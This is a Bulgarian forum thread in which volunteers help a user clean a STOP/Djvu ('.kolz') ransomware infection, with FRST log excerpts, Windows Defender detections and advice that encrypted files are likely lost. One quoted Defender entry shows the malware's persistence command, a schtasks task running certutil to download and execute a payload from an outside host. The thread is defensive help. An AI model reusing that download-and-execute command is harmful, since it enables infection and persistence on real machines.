Премини към съдържанието
  • Добре дошли!

    Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

    Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

     

Препоръчан отговор

Следваш стъпките от тази тема и чакаш търпеливо някой от специлистите да даде точни инструкции. Не се опитвай сам да решиш проблема, защото така затрудняваш персонала.

https://www.kaldata.com/forums/topic/132819-системата-ми-е-инфектирана-какво-да-правя-сега/

Линк към коментара
Сподели в други сайтове

А ти прочете ли каквои е написал @Eclipse2G?
Видя ли инструкциите, написани от вирусоборец и по кото работят специалистите, обслужващи раздела?

Линк към коментара
Сподели в други сайтове

Не четеш другарю Седларов, това е раздел за помощ в борбата срещу вирусите, специалистите в областта НЕ СА ясновидци, а в повечето случаи се налага да пишат код който е специално за съответната машина и може да бъде вреден за всяка друга.
Как точно предлагаш да ти се помогне при това положение?

Виж горе линка дето ти го е дал колегата и следвай стъпките, ако ли не : https://sanovnik.bg/forum/f-50-yasnovidstvo

Линк към коментара
Сподели в други сайтове

Ето начини за премахване: https://www.google.bg/search?q=Kolz+вирус&hl=bg

И от първия резултат, евентуално може да пробваш decryptor, но е малко вероятно да можеш да си възстановиш информацията: https://howtofix.guide/kolz-virus/

Ако нямаш архив, най-вероятно ще я загубиш.

 

Линк към коментара
Сподели в други сайтове

Бас ловя, че това е поредното разширение на STOP Djvu Ransomware. Декриптор за новите варианти няма (особено ако същите използват онлайн ключ за криптиране, вместо офлайн такъв). Премахването на заразата обикновено е лесна задача, но е добре да почнете да се настройвате психически, че ако нямате бекъп на различни външни носители с данните ви е свършено малко или много.

Линк към коментара
Сподели в други сайтове

Здравейте,

Утре ще напиша скрипт за почистване. Има остатъци, които е добре да премахнем:

Цитат

 

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\Run: [keghwoka] => "C:\Users\HP xw4600\gibmtbpf.exe"

HKU\S-1-5-21-3869048764-3273615316-3993963304-1001\...\StartupApproved\Run: => "keghwoka"

2020-09-22 13:49 - 2020-09-22 13:55 - 000000000 ____D C:\Users\HP xw4600\AppData\LocalLow\IGDump
2020-09-22 13:42 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\cwj0pon50yl
2020-09-22 13:38 - 2020-09-22 13:38 - 000001111 _____ C:\Users\HP xw4600\_readme.txt
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\xrpMCARCr4
2020-09-22 13:38 - 2020-09-22 13:37 - 000196608 _____ C:\Users\HP xw4600\AppData\LocalLow\exuieaoEiI
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\JBdT3hVOfo
2020-09-22 13:38 - 2020-09-22 13:36 - 000425984 _____ C:\Users\HP xw4600\AppData\LocalLow\aMeAjSWfch
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\ZMrF6cI6NX
2020-09-22 13:38 - 2020-07-26 16:40 - 000069632 _____ C:\Users\HP xw4600\AppData\LocalLow\8DYdD3ojxS
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\x3CF3EDNhm
2020-09-22 13:38 - 2020-06-30 08:28 - 000163840 _____ C:\Users\HP xw4600\AppData\LocalLow\bbSqWy6yhK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\zdGc81tBDK
2020-09-22 13:38 - 2020-06-30 08:28 - 000073728 _____ C:\Users\HP xw4600\AppData\LocalLow\gxIX4a2dRE
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\IDCdJOyapn
2020-09-22 13:38 - 2019-08-04 21:05 - 000065536 _____ C:\Users\HP xw4600\AppData\LocalLow\3soLBPh71Y
2020-09-22 13:36 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f
2020-09-22 13:36 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5
2020-09-22 13:36 - 2020-09-22 13:43 - 012384590 _____ C:\Users\HP xw4600\gibmtbpf.exe.kolz
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\t5v5u9q3q6u5y1s1
2020-09-22 13:36 - 2020-09-22 13:38 - 000000000 ____D C:\ProgramData\HVG53LKK6HBIDYVX56WB2MUPW
2020-09-22 13:36 - 2020-09-22 13:36 - 000916735 _____ (SQLite Development Team) C:\Users\HP xw4600\AppData\LocalLow\sqlite3.dll
2020-09-22 13:36 - 2020-09-22 13:36 - 000000555 _____ C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt
2020-09-22 13:36 - 2020-09-22 13:36 - 000000000 ____D C:\SystemID
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ___HD C:\WINDOWS\rss
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Users\HP xw4600\AppData\Roaming\ibkccjksq22
2020-09-22 13:35 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files\L8P5QHJ8VR
2020-09-22 13:35 - 2020-09-22 14:06 - 000000000 ____D C:\Users\HP xw4600\AppData\Local\ScrSnap
2020-09-22 13:34 - 2020-09-22 14:08 - 000000000 ____D C:\Program Files (x86)\PAOw
2019-12-07 12:08 - 2019-12-07 12:08 - 000320202 ___SH () C:\Users\HP xw4600\AppData\Roaming\cwieerh

Error: (09/22/2020 02:04:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Faulting module name: F047.exe, version: 1.0.0.1, time stamp: 0x5d890137
Exception code: 0xc0000005
Fault offset: 0x0137488a
Faulting process id: 0x9a8
Faulting application start time: 0x01d690cd112bd8f4
Faulting application path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Faulting module path: C:\Users\HP xw4600\AppData\Local\dc932c28-9dcc-4581-bf54-3a638ee9db3f\F047.exe
Report Id: 4c02a9df-55d8-4bd5-b90a-24351d17a141
Faulting package full name:
Faulting package-relative application ID:

Windows Defender:
===================================
Date: 2020-09-22 13:38:07.6700000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bulta!rfn&threatid=2147694403&enterprise=0
Name: Trojan:Win32/Bulta!rfn
ID: 2147694403
Severity: Severe
Category: Trojan
Path: process:_pid:8044,ProcessStart:132452445989568289
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F99.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:19.8330000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Glupteba&threatid=2147718257&enterprise=0
Name: Trojan:Win32/Glupteba
ID: 2147718257
Severity: Severe
Category: Trojan
Path: process:_pid:1980,ProcessStart:132452445830796454
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:17.0260000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-09-22 13:37:11.3390000Z
Description:
Microsoft Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fareit.V!MTB&threatid=2147743811&enterprise=0
Name: Trojan:Win32/Fareit.V!MTB
ID: 2147743811
Severity: Severe
Category: Trojan
Path: file:_C:\Users\HP xw4600\AppData\Local\2bbc358c-aa86-4857-bac0-1a8d30e61af5\updatewin2.exe
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\HPXW46~1\AppData\Local\Temp\F047.exe
Security intelligence Version: AV: 1.323.1684.0, AS: 1.323.1684.0, NIS: 1.323.1684.0
Engine Version: AM: 1.1.17400.5, NIS: 1.1.17400.5

Съдейки по следния файл обаче:

C:\Users\HP xw4600\AppData\Local\bowsakkdestx.txt

става ясно, че става въпрос за STOP DJVU Ransomware.

Линк към коментара
Сподели в други сайтове

преди 12 часа, B-boy/StyLe/ написа:

Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP xw4600\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F

Сори за офтопика ама не се сдържах :D  Как хубаво ползва LOL's ...

Линк към коментара
Сподели в други сайтове

Искам само да попитам автора как се е заразил с това.

Линк към коментара
Сподели в други сайтове

Какво стана със скрипта? Заразих се като свалих и инсталирах една програма която се оказа вирус ама вече късно. Слагат имена на известни програми на инсталиращите пакети и веднъж пуснеш ли я,край.

Линк към коментара
Сподели в други сайтове

Ами забавих се, защото имах лични ангажименти. Все пак форума ми е само хоби.

 

Изтеглете fixlist.txt и го запазете в папката, където сте свалили FRST64.exe (на десктопа)

Стартирайте FRST64.exe и натиснете бутона Fix веднъж!

След като приключи, ако ви поиска рестарт - съгласете се. След рестарта публикувайте лог файла - Fixlog.txt, който ще се създаде след работата на програмата.

Внимание: Скрипта е създаден за текущата система. Да не се ползва за други системи с подобни проблеми!

Това е засега.

Поздрави!

Линк към коментара
Сподели в други сайтове

Ами за тях няма какво да се направи. Както казах, криптираните файлове не можем да ги възстановим, а само да ги изтрием. Можем само да почистим заразата, както и направихме. Не вярвам авторите на криптиращия вирус да са включили системни файлове да бъдат криптирани, защото това би сринало работата на Windows, а те нямат файда от това, защото ако жертвата реши да си плати откупа няма да успее. Но ако има такива файлове, то тогава може би по-лесно би било да форматирате и преинсталирате. И в двата случая няма да си върнете файловете и ще се отървете от заразата, но поне след преинсталацията системата ви ще работи нормално (ако сега ви създава проблеми). Изборът оставям на вас. Само ме информирайте за да знам дали да продължаваме с почистващия процес.

Линк към коментара
Сподели в други сайтове

Между другото прикачения Fixlog.txt не върши особена работа, защото сте стартирали скрипта два пъти и първия Fixlog.txt се е презаписал и затова в новия лог показва, че търсените елементи не са били намерени.

Ran by HP xw4600 (24-09-2020 08:19:51) Run:2

Иначе ако решите да изтриете файловете с разширението *.kolz стартирайте следния bat файл с десен бутон и Run as administrators

del.bat

Линк към коментара
Сподели в други сайтове

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.
Бележка: Вашата публикация изисква одобрение от модератор, преди да стане видима за всички.

Гост
Напишете отговор в тази тема...

×   Вмъкнахте текст, който съдържа форматиране.   Премахни форматирането на текста

  Разрешени са само 75 емотикони.

×   Съдържанието от линка беше вградено автоматично.   Премахни съдържанието и покажи само линк

×   Съдържанието, което сте написали преди беше възстановено..   Изтрий всичко

×   You cannot paste images directly. Upload or insert images from URL.

  • Разглеждащи това в момента   0 потребители

    • Няма регистрирани потребители разглеждащи тази страница.
  • Подобни теми

    • от Емил Костов
      Моля да се провери дали тази машина е заразена или всичко е наред. При мен всичко работи, но когато се включи на мястото в офиса върви бавно, лентата със задачи на Windows блокира както и половината му команди.
      Прикачам съдържанието от FRST64
      Addition.txt FRST.txt
    • от Alpine Trail
      Здравейте!Преди около 2 месеца Avast взе да алармира за заплаха Експлойт.Изглежда това се оказа провокирано от Adobe Flash Player,защото след като го деинсталирах нещата се оправиха.Наскоро пак имах съмнения че нещо не е наред със системата ми,затова инсталирах MBAM,която почна да изкарва съобщения че блокирва някои неща от мюторент,както и от тракера p2p,но пробният му период изтече и ето че сега Avast пропищя.Изкарва съобщения:"Заплахата е обезвредена.Безопасно прекъснахме връзката на udp://172.86.180.122.9777,тъй като беше заразена с/ъс Botnet:Blacklist."
      Ето логовете от FRST:
      FRST.txt Addition.txt
    • от blinkxz
      Здравейте,отнякъде съм хванал RAT (remote administration tool).
      Който остава след преинсталация на Windows.
      Опитах да сканирам с няколко буут антивирусни,но без успех.
      Също пробвах да направя слоу формат,но гадинката си остава.
      В интернет прочетох,че има такива който поразяват MBR/BIOS.
      Имам още един проблем,че в момента съм на Линукс.
      Та какво да правя.
       
    • от turb1te
      Здравейте,
      Изтеглих Malwarebytes Anti-Malware и направих сканиране. Карантинирах откритите заплахи, но след рестартиране на системата отново се появиха нови заплахи от същия тип. Ще прикача лог от MBAM и от Farbar, както е по инструкции. Рестартирах лаптопа преди да създам прикачените логове, тоест не съм чистил отново преди да ги взема. Също пробвах да реша проблема с AdwCleaner, но не проработи. Бях чекнал всичките опции в AdwCleaner за ресет без chrome policies. В Farbar чекнах всичко преди сканиране.
      MBAM_20210718_1030.txt Addition.txt FRST.txt Shortcut.txt
×
×
  • Добави ново...

Информация

Поставихме бисквитки на устройството ви за най-добро потребителско изживяване. Можете да промените настройките си за бисквитки, или в противен случай приемаме, че сте съгласни с нашите Условия за ползване